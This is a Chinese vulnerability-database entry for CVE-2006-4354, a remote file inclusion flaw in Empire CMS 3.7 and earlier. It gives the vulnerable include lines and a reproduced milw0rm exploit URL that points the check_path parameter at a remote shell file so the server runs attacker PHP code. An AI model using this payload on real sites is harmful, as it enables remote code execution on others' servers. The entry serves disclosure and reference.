Empire CMS 'Checklevel.PHP'远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110884 漏洞类型 输入验证
发布时间 2006-08-22 更新时间 2006-09-18
CVE编号 CVE-2006-4354 CNNVD-ID CNNVD-200608-419
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2239
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-419
|漏洞详情
PhomeEmpireCMS3.7及早期版本的e/class/CheckLevel.php脚本存在PHP远程文件包含漏洞,远程攻击者可借助check_path参数中的URL执行任意PHP代码。
|漏洞EXP
Empire CMS <=3.7 (checklevel.php) Remote File Include Vulnerability
           Find by: Bob Linuson

# Code:

2   $includefile=$check_path."e/class/MemberLevel.php";
3   include("$includefile");
.....
67  include($check_path."e/class/connect.php");
68  include($check_path."e/class/db_sql.php");
69  include($check_path."e/class/user.php");


#Exploit:

http://www.site.com/e/class/checklevel.php?check_path=http://shell.txt?


#URL:

http://www.phome.net/tmp/ecms37/
http://www.phome.net/tmp/ecms37/down.php?url=/tmp/ecms37/ecms3.7-free.rar&
english:
http://translate.google.com/translate?u=http%3A%2F%2Fwww.phome.net%2Ftmp%2Fecms37%2F&langpair=zh-CN%7Cen&hl=zh-CN&newwindow=1&ie=UTF-8&oe=UTF-8&prev=%2Flanguage_tools

# milw0rm.com [2006-08-22]
|参考资料

来源:XF
名称:empire-checklevel-file-include(28504)
链接:http://xforce.iss.net/xforce/xfdb/28504
来源:BID
名称:19655
链接:http://www.securityfocus.com/bid/19655
来源:OSVDB
名称:28116
链接:http://www.osvdb.org/28116
来源:MILW0RM
名称:2239
链接:http://www.milw0rm.com/exploits/2239
来源:VUPEN
名称:ADV-2006-3363
链接:http://www.frsirt.com/english/advisories/2006/3363
来源:SECUNIA
名称:21584
链接:http://secunia.com/advisories/21584
来源:MILW0RM
名称:2239
链接:http://milw0rm.com/exploits/2239